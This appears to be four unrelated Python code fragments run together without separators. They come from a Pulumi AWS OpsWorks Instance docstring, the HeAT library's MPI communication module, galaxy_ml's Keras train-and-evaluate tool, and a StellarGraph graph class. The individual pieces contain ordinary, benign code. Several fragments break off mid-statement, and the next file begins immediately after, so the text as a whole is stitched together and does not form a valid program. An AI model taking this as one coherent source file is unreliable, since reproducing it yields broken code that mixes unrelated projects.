reported_os_name: Optional[pulumi.Input[str]] = None, reported_os_version: Optional[pulumi.Input[str]] = None, root_block_devices: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['InstanceRootBlockDeviceArgs']]]]] = None, root_device_type: Optional[pulumi.Input[str]] = None, root_device_volume_id: Optional[pulumi.Input[str]] = None, security_group_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, ssh_host_dsa_key_fingerprint: Optional[pulumi.Input[str]] = None, ssh_host_rsa_key_fingerprint: Optional[pulumi.Input[str]] = None, ssh_key_name: Optional[pulumi.Input[str]] = None, stack_id: Optional[pulumi.Input[str]] = None, state: Optional[pulumi.Input[str]] = None, status: Optional[pulumi.Input[str]] = None, subnet_id: Optional[pulumi.Input[str]] = None, tenancy: Optional[pulumi.Input[str]] = None, virtualization_type: Optional[pulumi.Input[str]] = None, __props__=None): """ Provides an OpsWorks instance resource. ## Example Usage ```python import pulumi import pulumi_aws as aws my_instance = aws.opsworks.Instance("my-instance", stack_id=aws_opsworks_stack["main"]["id"], layer_ids=[aws_opsworks_custom_layer["my-layer"]["id"]], instance_type="t2.micro", os="Amazon Linux 2015.09", state="stopped") ``` ## Block devices Each of the `*_block_device` attributes controls a portion of the AWS Instance's "Block Device Mapping". It's a good idea to familiarize yourself with [AWS's Block Device Mapping docs](http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/block-device-mapping-concepts.html) to understand the implications of using these attributes. The `root_block_device` mapping supports the following: * `volume_type` - (Optional) The type of volume. Can be `"standard"`, `"gp2"`, or `"io1"`. (Default: `"standard"`). * `volume_size` - (Optional) The size of the volume in gigabytes. * `iops` - (Optional) The amount of provisioned [IOPS](http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ebs-io-characteristics.html). 
This must be set with a `volume_type` of `"io1"`. * `delete_on_termination` - (Optional) Whether the volume should be destroyed on instance termination (Default: `true`). Modifying any of the `root_block_device` settings requires resource replacement. Each `ebs_block_device` supports the following: * `device_name` - The name of the device to mount. * `snapshot_id` - (Optional) The Snapshot ID to mount. * `volume_type` - (Optional) The type of volume. Can be `"standard"`, `"gp2"`, or `"io1"`. (Default: `"standard"`). * `volume_size` - (Optional) The size of the volume in gigabytes. * `iops` - (Optional) The amount of provisioned [IOPS](http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ebs-io-characteristics.html). This must be set with a `volume_type` of `"io1"`. * `delete_on_termination` - (Optional) Whether the volume should be destroyed on instance termination (Default: `true`). Modifying any `ebs_block_device` currently requires resource replacement. Each `ephemeral_block_device` supports the following: * `device_name` - The name of the block device to mount on the instance. * `virtual_name` - The [Instance Store Device Name](http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/InstanceStorage.html#InstanceStoreDeviceNames) (e.g. `"ephemeral0"`) Each AWS Instance type has a different set of Instance Store block devices available for attachment. AWS [publishes a list](http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/InstanceStorage.html#StorageOnInstanceTypes) of which ephemeral devices are available on each type. The devices are always identified by the `virtual_name` in the format `"ephemeral{0..N}"`. > **NOTE:** Currently, changes to `*_block_device` configuration of _existing_ resources cannot be automatically detected by this provider. After making updates to block device configuration, resource recreation can be manually triggered by using the [`up` command with the --replace argument](https://www.pulumi.com/docs/reference/cli/pulumi_up/). 
## Import Opsworks Instances can be imported using the `instance id`, e.g. ```sh $ pulumi import aws:opsworks/instance:Instance my_instance 4d6d1710-ded9-42a1-b08e-b043ad7af1e2 ``` :param str resource_name: The name of the resource. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[str] agent_version: The AWS OpsWorks agent to install. Defaults to `"INHERIT"`. :param pulumi.Input[str] ami_id: The AMI to use for the instance. If an AMI is specified, `os` must be `"Custom"`. :param pulumi.Input[str] architecture: Machine architecture for created instances. Can be either `"x86_64"` (the default) or `"i386"` :param pulumi.Input[str] auto_scaling_type: Creates load-based or time-based instances. If set, can be either: `"load"` or `"timer"`. :param pulumi.Input[str] availability_zone: Name of the availability zone where instances will be created by default. :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['InstanceEbsBlockDeviceArgs']]]] ebs_block_devices: Additional EBS block devices to attach to the instance. See Block Devices below for details. :param pulumi.Input[bool] ebs_optimized: If true, the launched EC2 instance will be EBS-optimized. :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['InstanceEphemeralBlockDeviceArgs']]]] ephemeral_block_devices: Customize Ephemeral (also known as "Instance Store") volumes on the instance. See Block Devices below for details. :param pulumi.Input[str] hostname: The instance's host name. :param pulumi.Input[bool] install_updates_on_boot: Controls where to install OS and package updates when the instance boots. Defaults to `true`. :param pulumi.Input[str] instance_type: The type of instance to start :param pulumi.Input[Sequence[pulumi.Input[str]]] layer_ids: The ids of the layers the instance will belong to. :param pulumi.Input[str] os: Name of operating system that will be installed. :param pulumi.Input[str] private_dns: The private DNS name assigned to the instance. 
Can only be used inside the Amazon EC2, and only available if you've enabled DNS hostnames for your VPC :param pulumi.Input[str] private_ip: The private IP address assigned to the instance :param pulumi.Input[str] public_dns: The public DNS name assigned to the instance. For EC2-VPC, this is only available if you've enabled DNS hostnames for your VPC :param pulumi.Input[str] public_ip: The public IP address assigned to the instance, if applicable. :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['InstanceRootBlockDeviceArgs']]]] root_block_devices: Customize details about the root block device of the instance. See Block Devices below for details. :param pulumi.Input[str] root_device_type: Name of the type of root device instances will have by default. Can be either `"ebs"` or `"instance-store"` :param pulumi.Input[Sequence[pulumi.Input[str]]] security_group_ids: The associated security groups. :param pulumi.Input[str] ssh_key_name: Name of the SSH keypair that instances will have by default. :param pulumi.Input[str] stack_id: The id of the stack the instance will belong to. :param pulumi.Input[str] state: The desired state of the instance. Can be either `"running"` or `"stopped"`. :param pulumi.Input[str] subnet_id: Subnet ID to attach
""" Module implementing the communication layer of HeAT """ from __future__ import annotations import numpy as np import os import subprocess import torch from mpi4py import MPI from typing import Any, Callable, Optional, List, Tuple, Union from .stride_tricks import sanitize_axis CUDA_AWARE_MPI = False # check whether OpenMPI support CUDA-aware MPI if "openmpi" in os.environ.get("MPI_SUFFIX", "").lower(): buffer = subprocess.check_output(["ompi_info", "--parsable", "--all"]) CUDA_AWARE_MPI = b"mpi_built_with_cuda_support:value:true" in buffer # MVAPICH CUDA_AWARE_MPI = CUDA_AWARE_MPI or os.environ.get("MV2_USE_CUDA") == "1" # MPICH CUDA_AWARE_MPI = CUDA_AWARE_MPI or os.environ.get("MPIR_CVAR_ENABLE_HCOLL") == "1" # ParaStationMPI CUDA_AWARE_MPI = CUDA_AWARE_MPI or os.environ.get("PSP_CUDA") == "1" class MPIRequest: """ Represents a handle on a non-blocking operation Parameters ---------- handle: MPI.Communicator Handle for the mpi4py Communicator sendbuf: DNDarray or torch.Tensor or Any The buffer for the data to be send recvbuf: DNDarray or torch.Tensor or Any The buffer to the receive data tensor: torch.Tensor Internal Data permutation: Tuple[int,...] Permutation of the tensor axes """ def __init__( self, handle, sendbuf: Union[DNDarray, torch.Tensor, Any] = None, recvbuf: Union[DNDarray, torch.Tensor, Any] = None, tensor: torch.Tensor = None, permutation: Tuple[int, ...] = None, ): self.handle = handle self.tensor = tensor self.recvbuf = recvbuf self.sendbuf = sendbuf self.permutation = permutation def Wait(self, status: MPI.Status = None): """ Waits for an MPI request to complete """ self.handle.Wait(status) if ( self.tensor is not None and isinstance(self.tensor, torch.Tensor) and self.tensor.is_cuda and not CUDA_AWARE_MPI ): if self.permutation is not None: self.recvbuf = self.recvbuf.permute(self.permutation) self.tensor.copy_(self.recvbuf) def __getattr__(self, name: str) -> Callable: """ Default pass-through for the communicator methods. 
Parameters ---------- name : str The name of the method to be called. """ return getattr(self.handle, name) class Communication: """ Base class for Communications (inteded for other backends) """ @staticmethod def is_distributed() -> NotImplementedError: """ Whether or not the Communication is distributed """ raise NotImplementedError() def __init__(self) -> NotImplementedError: raise NotImplementedError() def chunk(self, shape, split) -> NotImplementedError: """ Calculates the chunk of data that will be assigned to this compute node given a global data shape and a split axis. Returns ``(offset, local_shape, slices)``: the offset in the split dimension, the resulting local shape if the global input shape is chunked on the split axis and the chunk slices with respect to the given shape Parameters ---------- shape : Tuple[int,...] The global shape of the data to be split split : int The axis along which to chunk the data """ raise NotImplementedError() class MPICommunication(Communication): """ Class encapsulating all MPI Communication Parameters ---------- handle: MPI.Communicator Handle for the mpi4py Communicator """ __mpi_type_mappings = { torch.bool: MPI.BOOL, torch.uint8: MPI.UNSIGNED_CHAR, torch.int8: MPI.SIGNED_CHAR, torch.int16: MPI.SHORT, torch.int32: MPI.INT, torch.int64: MPI.LONG, torch.bfloat16: MPI.INT16_T, torch.float16: MPI.INT16_T, torch.float32: MPI.FLOAT, torch.float64: MPI.DOUBLE, torch.complex64: MPI.COMPLEX, torch.complex128: MPI.DOUBLE_COMPLEX, } def __init__(self, handle=MPI.COMM_WORLD): self.handle = handle try: self.rank = handle.Get_rank() self.size = handle.Get_size() except MPI.Exception: # ranks not within the group will fail with an MPI.Exception, this is expected self.rank = None self.size = None def is_distributed(self) -> bool: """ Determines whether the communicator is distributed, i.e. handles more than one node. 
""" return self.size > 1 def chunk( self, shape: Tuple[int], split: int, rank: int = None, w_size: int = None ) -> Tuple[int, Tuple[int], Tuple[slice]]: """ Calculates the chunk of data that will be assigned to this compute node given a global data shape and a split axis. Returns ``(offset, local_shape, slices)``: the offset in the split dimension, the resulting local shape if the global input shape is chunked on the split axis and the chunk slices with respect to the given shape Parameters ---------- shape : Tuple[int,...] The global shape of the data to be split split : int The axis along which to chunk the data rank : int, optional Process for which the chunking is calculated for, defaults to ``self.rank``. Intended for creating chunk maps without communication w_size : int, optional The MPI world size, defaults to ``self.size``. Intended for creating chunk maps without communication """ # ensure the split axis is valid, we actually do not need it split = sanitize_axis(shape, split) if split is None: return 0, shape, tuple(slice(0, end) for end in shape) rank = self.rank if rank is None else rank w_size = self.size if w_size is None else w_size if not isinstance(rank, int) or not isinstance(w_size, int): raise TypeError("rank and size must be integers") dims = len(shape) size = shape[split] chunk = size // w_size remainder = size % w_size if remainder > rank: chunk += 1 start = rank * chunk else: start = rank * chunk + remainder end = start + chunk return ( start, tuple(shape[i] if i != split else end - start for i in range(dims)), tuple(slice(0, shape[i]) if i != split else slice(start, end) for i in range(dims)), ) def counts_displs_shape( self, shape: Tuple[int], axis: int ) -> Tuple[Tuple[int], Tuple[int], Tuple[int]]: """ Calculates the item counts, displacements and output shape for a variable sized all-to-all MPI-call (e.g. ``MPI_Alltoallv``). The passed shape is regularly chunk along the given axis and for all nodes. 
        Parameters
        ----------
        shape : Tuple[int,...]
            The object for which to calculate the chunking.
        axis : int
            The axis along which the chunking is performed.
        """
        # elements sent/received per node: an even split of shape[axis], with the
        # first (shape[axis] % size) ranks taking one extra element
        counts = torch.full((self.size,), shape[axis] // self.size)
        counts[: shape[axis] % self.size] += 1
        # the displacements into the buffer: exclusive prefix sum of the counts
        displs = torch.zeros((self.size,), dtype=counts.dtype)
        torch.cumsum(counts[:-1], out=displs[1:], dim=0)
        # helper that calculates the output shape for a receiving buffer under the assumption all nodes have an equally
        # sized input compared to this node
        output_shape = list(shape)
        output_shape[axis] = self.size * counts[self.rank].item()
        return tuple(counts.tolist()), tuple(displs.tolist()), tuple(output_shape)

    @classmethod
    def mpi_type_and_elements_of(
        cls, obj: Union[DNDarray, torch.Tensor], counts: Tuple[int], displs: Tuple[int]
    ) -> Tuple[MPI.Datatype, Tuple[int, ...]]:
        """
        Determines the MPI data type and number of respective elements for the given tensor
        (:class:`~heat.core.dndarray.DNDarray` or ``torch.Tensor``). In case the tensor is
        contiguous in memory, a native MPI data type can be used. Otherwise, a derived data
        type is automatically constructed using the storage information of the passed object.

        Parameters
        ----------
        obj : DNDarray or torch.Tensor
            The object for which to construct the MPI data type and number of elements
        counts : Tuple[ints,...], optional
            Optional counts arguments for variable MPI-calls (e.g. Alltoallv)
        displs : Tuple[ints,...], optional
            Optional displacements arguments for variable MPI-calls (e.g. Alltoallv)

        # ToDo: The option to explicitly specify the counts and displacements to be sent
        # still needs proper implementation
        """
        mpi_type, elements = cls.__mpi_type_mappings[obj.dtype], torch.numel(obj)

        # simple case, contiguous memory can be transmitted as is
        if obj.is_contiguous():
            if counts is None:
                return mpi_type, elements
            else:
                # scale counts/displacements from "rows" to flat element counts
                factor = np.prod(obj.shape[1:])
                return (
                    mpi_type,
                    (
                        tuple(factor * ele for ele in counts),
                        (tuple(factor * ele for ele in displs)),
                    ),
                )

        # non-contiguous memory, e.g. after a transpose, has to be packed in derived MPI types
        elements = obj.shape[0]
        shape = obj.shape[1:]
        strides = [1] * len(shape)
        strides[0] = obj.stride()[-1]
        strides = strides[::-1]
        # byte offsets of each (non-leading) dimension within the storage
        offsets = [obj.element_size() * stride for stride in obj.stride()[:-1]]

        # chain the derived vector types over the remaining dimensions, innermost first
        for i in range(len(shape) - 1, -1, -1):
            mpi_type = mpi_type.Create_vector(shape[i], 1, strides[i]).Create_resized(0, offsets[i])
            mpi_type.Commit()

        if counts is not None:
            return mpi_type, (counts, displs)

        return mpi_type, elements

    @classmethod
    def as_mpi_memory(cls, obj) -> MPI.memory:
        """
        Converts the passed ``torch.Tensor`` into an MPI compatible memory view.

        Parameters
        ----------
        obj : torch.Tensor
            The tensor to be converted into a MPI memory view.
        """
        # expose the tensor's underlying storage to MPI without copying
        return MPI.memory.fromaddress(obj.data_ptr(), 0)

    @classmethod
    def as_buffer(
        cls, obj: torch.Tensor, counts: Tuple[int] = None, displs: Tuple[int] = None
    ) -> List[Union[MPI.memory, Tuple[int, int], MPI.Datatype]]:
        """
        Converts a passed ``torch.Tensor`` into a memory buffer object with associated number
        of elements and MPI data type.

        Parameters
        ----------
        obj : torch.Tensor
            The object to be converted into a buffer representation.
        counts : Tuple[int,...], optional
            Optional counts arguments for variable MPI-calls (e.g. Alltoallv)
        displs : Tuple[int,...], optional
            Optional displacements arguments for variable MPI-calls (e.g. Alltoallv)
        """
        squ = False
        if not obj.is_contiguous() and obj.ndim == 1:
            # this makes the math work below this function.
            obj.unsqueeze_(-1)
            squ = True
        mpi_type, elements = cls.mpi_type_and_elements_of(obj, counts, displs)

        mpi_mem
<filename>galaxy_ml/tools/keras_train_and_eval.py<gh_stars>0
import argparse
import joblib
import json
import numpy as np
import os
import pandas as pd
import warnings
from itertools import chain
from scipy.io import mmread
from sklearn.pipeline import Pipeline
from sklearn.metrics._scorer import _check_multimetric_scoring
from sklearn.model_selection._validation import _score
from sklearn.utils import indexable, _safe_indexing
from galaxy_ml.model_validations import train_test_split
from galaxy_ml.keras_galaxy_models import (_predict_generator,
                                           KerasGBatchClassifier)
from galaxy_ml.model_persist import load_model_from_h5, dump_model_to_h5
from galaxy_ml.utils import (SafeEval, clean_params, gen_compute_scores,
                             get_main_estimator, get_scoring, get_module,
                             read_columns)


N_JOBS = int(os.environ.get('GALAXY_SLOTS', 1))
CACHE_DIR = os.path.join(os.getcwd(), 'cached')
# `os` is deliberately removed from the module namespace after the constants
# above are computed (keeps it out of any later dynamic evaluation context)
del os
# hyperparameter names with these suffixes must never be swapped/searched
NON_SEARCHABLE = ('n_jobs', 'pre_dispatch', 'memory', '_path', '_dir',
                  'nthread', 'callbacks')
ALLOWED_CALLBACKS = ('EarlyStopping', 'TerminateOnNaN', 'ReduceLROnPlateau',
                     'CSVLogger', 'None')


def _eval_swap_params(params_builder):
    """Safely evaluate user-supplied hyperparameter swap values.

    Parameters
    ----------
    params_builder : dict
        Galaxy tool parameter section with a 'param_set' list; each entry
        carries 'sp_name' (parameter name) and 'sp_value' (expression text).

    Returns
    -------
    dict
        Mapping of parameter name to its evaluated value, suitable for
        ``estimator.set_params(**...)``.
    """
    swap_params = {}
    for p in params_builder['param_set']:
        swap_value = p['sp_value'].strip()
        if swap_value == '':
            # empty value means "leave this parameter alone"
            continue
        param_name = p['sp_name']
        if param_name.lower().endswith(NON_SEARCHABLE):
            warnings.warn("Warning: `%s` is not eligible for search and was "
                          "omitted!" % param_name)
            continue

        if not swap_value.startswith(':'):
            safe_eval = SafeEval(load_scipy=True, load_numpy=True)
            ev = safe_eval(swap_value)
        else:
            # Have `:` before search list, asks for estimator evaluation
            safe_eval_es = SafeEval(load_estimators=True)
            swap_value = swap_value[1:].strip()
            # TODO maybe add regular expression check
            ev = safe_eval_es(swap_value)
        swap_params[param_name] = ev

    return swap_params


def train_test_split_none(*arrays, **kwargs):
    """extend train_test_split to take None arrays and support split by group names.
""" nones = [] new_arrays = [] for idx, arr in enumerate(arrays): if arr is None: nones.append(idx) else: new_arrays.append(arr) if kwargs['shuffle'] == 'None': kwargs['shuffle'] = None group_names = kwargs.pop('group_names', None) if group_names is not None and group_names.strip(): group_names = [name.strip() for name in group_names.split(',')] new_arrays = indexable(*new_arrays) groups = kwargs['labels'] n_samples = new_arrays[0].shape[0] index_arr = np.arange(n_samples) test = index_arr[np.isin(groups, group_names)] train = index_arr[~np.isin(groups, group_names)] rval = list(chain.from_iterable( (_safe_indexing(a, train), _safe_indexing(a, test)) for a in new_arrays)) else: rval = train_test_split(*new_arrays, **kwargs) for pos in nones: rval[pos * 2: 2] = [None, None] return rval def _evaluate_keras_and_sklearn_scores(estimator, data_generator, X, y=None, sk_scoring=None, steps=None, batch_size=32, return_predictions=False): """output scores for bother keras and sklearn metrics Parameters ----------- estimator : object Fitted `galaxy_ml.keras_galaxy_models.KerasGBatchClassifier`. data_generator : object From `galaxy_ml.preprocessors.ImageDataFrameBatchGenerator`. X : 2-D array Contains indecies of images that need to be evaluated. y : None Target value. sk_scoring : dict Galaxy tool input parameters. steps : integer or None Evaluation/prediction steps before stop. batch_size : integer Number of samples in a batch return_predictions : bool, default is False Whether to return predictions and true labels. 
""" scores = {} generator = data_generator.flow(X, y=y, batch_size=batch_size) # keras metrics evaluation # handle scorer, convert to scorer dict generator.reset() score_results = estimator.model_.evaluate_generator(generator, steps=steps) metrics_names = estimator.model_.metrics_names if not isinstance(metrics_names, list): scores[metrics_names] = score_results else: scores = dict(zip(metrics_names, score_results)) if sk_scoring['primary_scoring'] == 'default' and\ not return_predictions: return scores generator.reset() predictions, y_true = _predict_generator(estimator.model_, generator, steps=steps) # for sklearn metrics if sk_scoring['primary_scoring'] != 'default': scorer = get_scoring(sk_scoring) if not isinstance(scorer, (dict, list)): scorer = [sk_scoring['primary_scoring']] scorer = _check_multimetric_scoring(estimator, scoring=scorer) sk_scores = gen_compute_scores(y_true, predictions, scorer) scores.update(sk_scores) if return_predictions: return scores, predictions, y_true else: return scores, None, None def main(inputs, infile_estimator, infile1, infile2, outfile_result, outfile_object=None, outfile_y_true=None, outfile_y_preds=None, groups=None, ref_seq=None, intervals=None, targets=None, fasta_path=None): """ Parameter --------- inputs : str File path to galaxy tool parameter. infile_estimator : str File path to estimator. infile1 : str File path to dataset containing features. infile2 : str File path to dataset containing target values. outfile_result : str File path to save the results, either cv_results or test result. outfile_object : str, optional File path to save searchCV object. outfile_y_true : str, optional File path to target values for prediction. outfile_y_preds : str, optional File path to save predictions. groups : str File path to dataset containing groups labels. ref_seq : str File path to dataset containing genome sequence file. intervals : str File path to dataset containing interval file. 
    targets : str
        File path to dataset compressed target bed file.
    fasta_path : str
        File path to dataset containing fasta file.
    """
    warnings.simplefilter('ignore')

    with open(inputs, 'r') as param_handler:
        params = json.load(param_handler)

    # load estimator
    estimator = load_model_from_h5(infile_estimator)
    estimator = clean_params(estimator)

    # swap hyperparameter
    swapping = params['experiment_schemes']['hyperparams_swapping']
    swap_params = _eval_swap_params(swapping)
    estimator.set_params(**swap_params)

    estimator_params = estimator.get_params()

    # store read dataframe object (cache keyed by path + header setting)
    loaded_df = {}

    input_type = params['input_options']['selected_input']
    # tabular input
    if input_type == 'tabular':
        header = 'infer' if params['input_options']['header1'] else None
        column_option = (params['input_options']['column_selector_options_1']
                         ['selected_column_selector_option'])
        if column_option in ['by_index_number', 'all_but_by_index_number',
                             'by_header_name', 'all_but_by_header_name']:
            c = params['input_options']['column_selector_options_1']['col1']
        else:
            c = None

        df_key = infile1 + repr(header)
        df = pd.read_csv(infile1, sep='\t', header=header, parse_dates=True)
        loaded_df[df_key] = df

        X = read_columns(df, c=c, c_option=column_option).astype(float)
    # sparse input
    elif input_type == 'sparse':
        X = mmread(open(infile1, 'r'))
    # fasta_file input: X holds row indices into the fasta, not raw sequences
    elif input_type == 'seq_fasta':
        pyfaidx = get_module('pyfaidx')
        sequences = pyfaidx.Fasta(fasta_path)
        n_seqs = len(sequences.keys())
        X = np.arange(n_seqs)[:, np.newaxis]
        for param in estimator_params.keys():
            if param.endswith('fasta_path'):
                estimator.set_params(
                    **{param: fasta_path})
                break
        else:
            raise ValueError(
                "The selected estimator doesn't support "
                "fasta file input! Please consider using "
                "KerasGBatchClassifier with "
                "FastaDNABatchGenerator/FastaProteinBatchGenerator "
                "or having GenomeOneHotEncoder/ProteinOneHotEncoder "
                "in pipeline!")
    elif input_type == 'refseq_and_interval':
        path_params = {
            'data_batch_generator__ref_genome_path': ref_seq,
            'data_batch_generator__intervals_path': intervals,
            'data_batch_generator__target_path': targets
        }
        estimator.set_params(**path_params)
        n_intervals = sum(1 for line in open(intervals))
        X = np.arange(n_intervals)[:, np.newaxis]

    # Get target y
    header = 'infer' if params['input_options']['header2'] else None
    column_option = (params['input_options']['column_selector_options_2']
                     ['selected_column_selector_option2'])
    if column_option in ['by_index_number', 'all_but_by_index_number',
                         'by_header_name', 'all_but_by_header_name']:
        c = params['input_options']['column_selector_options_2']['col2']
    else:
        c = None

    df_key = infile2 + repr(header)
    if df_key in loaded_df:
        infile2 = loaded_df[df_key]
    else:
        infile2 = pd.read_csv(infile2, sep='\t',
                              header=header, parse_dates=True)
        loaded_df[df_key] = infile2

    y = read_columns(
        infile2,
        c=c,
        c_option=column_option,
        sep='\t',
        header=header,
        parse_dates=True)
    if len(y.shape) == 2 and y.shape[1] == 1:
        y = y.ravel()
    if input_type == 'refseq_and_interval':
        # targets come from the batch generator instead; y itself is unused
        estimator.set_params(
            data_batch_generator__features=y.ravel().tolist())
        y = None
    # end y

    # load groups
    if groups:
        groups_selector = (params['experiment_schemes']['test_split']
                           ['split_algos']).pop('groups_selector')

        header = 'infer' if groups_selector['header_g'] else None
        column_option = \
            (groups_selector['column_selector_options_g']
             ['selected_column_selector_option_g'])
        if column_option in ['by_index_number', 'all_but_by_index_number',
                             'by_header_name', 'all_but_by_header_name']:
            c = groups_selector['column_selector_options_g']['col_g']
        else:
            c = None

        df_key = groups + repr(header)
        if df_key in loaded_df:
            groups = loaded_df[df_key]

        groups = read_columns(
            groups,
            c=c,
            c_option=column_option,
            sep='\t',
            header=header,
            parse_dates=True)
        groups = groups.ravel()

    # del loaded_df
    del loaded_df

    # cache iraps_core fits could increase search speed significantly
    memory = joblib.Memory(location=CACHE_DIR, verbose=0)
    main_est = get_main_estimator(estimator)
    if main_est.__class__.__name__ == 'IRAPSClassifier':
        main_est.set_params(memory=memory)

    # handle scorer, convert to scorer dict
    scoring = params['experiment_schemes']['metrics']['scoring']
    scorer = get_scoring(scoring)
    if not isinstance(scorer, (dict, list)):
        scorer = [scoring['primary_scoring']]
    scorer = _check_multimetric_scoring(estimator, scoring=scorer)

    # handle test (first) split
    test_split_options = (params['experiment_schemes']
                          ['test_split']['split_algos'])

    if test_split_options['shuffle'] == 'group':
        test_split_options['labels'] = groups
    if test_split_options['shuffle'] == 'stratified':
        if y is not None:
            test_split_options['labels'] = y
        else:
            raise ValueError("Stratified shuffle split is not "
                             "applicable on empty target values!")

    X_train, X_test, y_train, y_test, groups_train, groups_test = \
        train_test_split_none(X, y, groups, **test_split_options)

    exp_scheme = params['experiment_schemes']['selected_exp_scheme']

    # handle validation (second) split
    if exp_scheme == 'train_val_test':
        val_split_options = (params['experiment_schemes']
                             ['val_split']['split_algos'])

        if val_split_options['shuffle'] == 'group':
            val_split_options['labels'] = groups_train
        if val_split_options['shuffle'] == 'stratified':
            if y_train is not None:
                val_split_options['labels'] = y_train
            else:
                raise ValueError("Stratified shuffle split is not "
                                 "applicable on empty target values!")

        X_train, X_val, y_train, y_val, groups_train, groups_val = \
            train_test_split_none(X_train, y_train, groups_train,
                                  **val_split_options)

    # train and eval
    # NOTE(review): the config/model_type attribute pair looks like a duck-type
    # check for keras-backed estimators that accept validation_data -- confirm
    if hasattr(estimator, 'config') and hasattr(estimator, 'model_type'):
        if exp_scheme == 'train_val_test':
            estimator.fit(X_train, y_train,
                          validation_data=(X_val, y_val))
        else:
            estimator.fit(X_train, y_train,
                          validation_data=(X_test, y_test))
    else:
        estimator.fit(X_train, y_train)

    if isinstance(estimator, KerasGBatchClassifier):
        scores = {}
        steps = estimator.prediction_steps
        batch_size = estimator.batch_size
        data_generator = estimator.data_generator_

        scores, predictions, y_true = _evaluate_keras_and_sklearn_scores(
            estimator, data_generator, X_test, y=y_test,
            sk_scoring=scoring, steps=steps, batch_size=batch_size,
            return_predictions=bool(outfile_y_true))

    else:
        scores = {}
        if hasattr(estimator, 'model_') \
                and hasattr(estimator.model_, 'metrics_names'):
            batch_size = estimator.batch_size
            score_results = estimator.model_.evaluate(
                X_test, y=y_test, batch_size=batch_size, verbose=0)
            metrics_names = estimator.model_.metrics_names
            if not isinstance(metrics_names, list):
                scores[metrics_names] = score_results
            else:
                scores = dict(zip(metrics_names, score_results))

        if hasattr(estimator, 'predict_proba'):
            predictions = estimator.predict_proba(X_test)
        else:
            predictions = estimator.predict(X_test)
        y_true = y_test
        sk_scores = _score(estimator, X_test, y_test, scorer)
        scores.update(sk_scores)

    # handle output
    if outfile_y_true:
        try:
            pd.DataFrame(y_true).to_csv(outfile_y_true, sep='\t',
                                        index=False)
            pd.DataFrame(predictions).astype(np.float32).to_csv(
                outfile_y_preds, sep='\t', index=False,
                float_format='%g', chunksize=10000)
        except Exception as e:
            print("Error in saving predictions: %s" % e)

    # handle output: wrap scalar scores in lists so a one-row frame results
    for name, score in scores.items():
        scores[name] = [score]
    df = pd.DataFrame(scores)
    df = df[sorted(df.columns)]
    df.to_csv(path_or_buf=outfile_result, sep='\t',
              header=True, index=False)

    memory.clear(warn=False)

    if outfile_object:
        dump_model_to_h5(estimator, outfile_object)


if __name__ == '__main__':
    aparser = argparse.ArgumentParser()
    aparser.add_argument("-i", "--inputs", dest="inputs", required=True)
    aparser.add_argument("-e", "--estimator", dest="infile_estimator")
    aparser.add_argument("-X", "--infile1", dest="infile1")
    aparser.add_argument("-y", "--infile2", dest="infile2")
aparser.add_argument("-O", "--outfile_result", dest="outfile_result") aparser.add_argument("-o", "--outfile_object", dest="outfile_object") aparser.add_argument("-l", "--outfile_y_true", dest="outfile_y_true") aparser.add_argument("-p", "--outfile_y_preds", dest="outfile_y_preds") aparser.add_argument("-g", "--groups", dest="groups") aparser.add_argument("-r", "--ref_seq", dest="ref_seq") aparser.add_argument("-b", "--intervals", dest="intervals") aparser.add_argument("-t", "--targets",
        else:
            data_index_maps = {}
            data_arrays = {}

        # TODO: What other convenience attributes do we need?
        self._nodes_by_type = None

        # This stores the feature vectors per node type as numpy arrays
        self._node_attribute_arrays = data_arrays

        # This stores the map between node ID and index in the attribute arrays
        self._node_index_maps = data_index_maps

    def __repr__(self):
        # short human-readable summary: class, directedness, node/edge counts
        directed_str = "Directed" if self.is_directed() else "Undirected"
        s = "{}: {} multigraph\n".format(type(self).__name__, directed_str)
        s += " Nodes: {}, Edges: {}\n".format(
            self.number_of_nodes(), self.number_of_edges()
        )
        return s

    def _get_node_type(self, node_data):
        # Read the node's type attribute; if absent, write the default back
        # into the node's data dict so later lookups are consistent.
        node_type = node_data.get(self._node_type_attr)
        if node_type is None:
            node_type = self._node_type_default
            node_data[self._node_type_attr] = node_type
        return node_type

    def _get_edge_type(self, edge_data):
        # Same defaulting behaviour as _get_node_type, but for edges.
        edge_type = edge_data.get(self._edge_type_attr)
        if edge_type is None:
            edge_type = self._edge_type_default
            edge_data[self._edge_type_attr] = edge_type
        return edge_type

    def check_graph_for_ml(self, features=True):
        """
        Checks if all properties required for machine learning training/inference
        are set up. An error will be raised if the graph is not correctly setup.
        """
        # TODO: These are simple tests and miss many problems that could arise, improve!
        # Check features on the nodes:
        if features and len(self._node_attribute_arrays) == 0:
            raise RuntimeError(
                "This StellarGraph has no numeric feature attributes for nodes"
                "Node features are required for machine learning"
            )

        # TODO: check the schema

        # TODO: check the feature node_ids against the graph node ids?

    def get_index_for_nodes(self, nodes, node_type=None):
        """
        Get the indices for the specified node or nodes.
        If the node type is not specified the node types will be found
        for all nodes. It is therefore important to supply the ``node_type``
        for this method to be fast.

        Args:
            n: (list or hashable) Node ID or list of node IDs
            node_type: (hashable) the type of the nodes.
        Returns:
            Numpy array containing the indices for the requested nodes.
        """
        if not is_real_iterable(nodes):
            nodes = [nodes]

        # Get the node type if not specified.
        if node_type is None:
            # infer the (single) type from the nodes themselves; None entries
            # are skipped
            node_types = {
                self._get_node_type(self._graph.nodes[n])
                for n in nodes
                if n is not None
            }
            if len(node_types) > 1:
                raise ValueError("All nodes must be of the same type.")

            if len(node_types) == 0:
                raise ValueError(
                    "At least one node must be given if node_type not specified"
                )

            node_type = node_types.pop()

        # Get index for nodes of this type
        nt_id_to_index = self._node_index_maps[node_type]
        # unknown node IDs map to None rather than raising here
        node_indices = [nt_id_to_index.get(n) for n in nodes]
        return node_indices

    def node_features(self, nodes, node_type=None):
        """
        Get the numeric feature vectors for the specified node or nodes.
        If the node type is not specified the node types will be found
        for all nodes. It is therefore important to supply the ``node_type``
        for this method to be fast.

        Args:
            n: (list or hashable) Node ID or list of node IDs
            node_type: (hashable) the type of the nodes.

        Returns:
            Numpy array containing the node features for the requested nodes.
        """
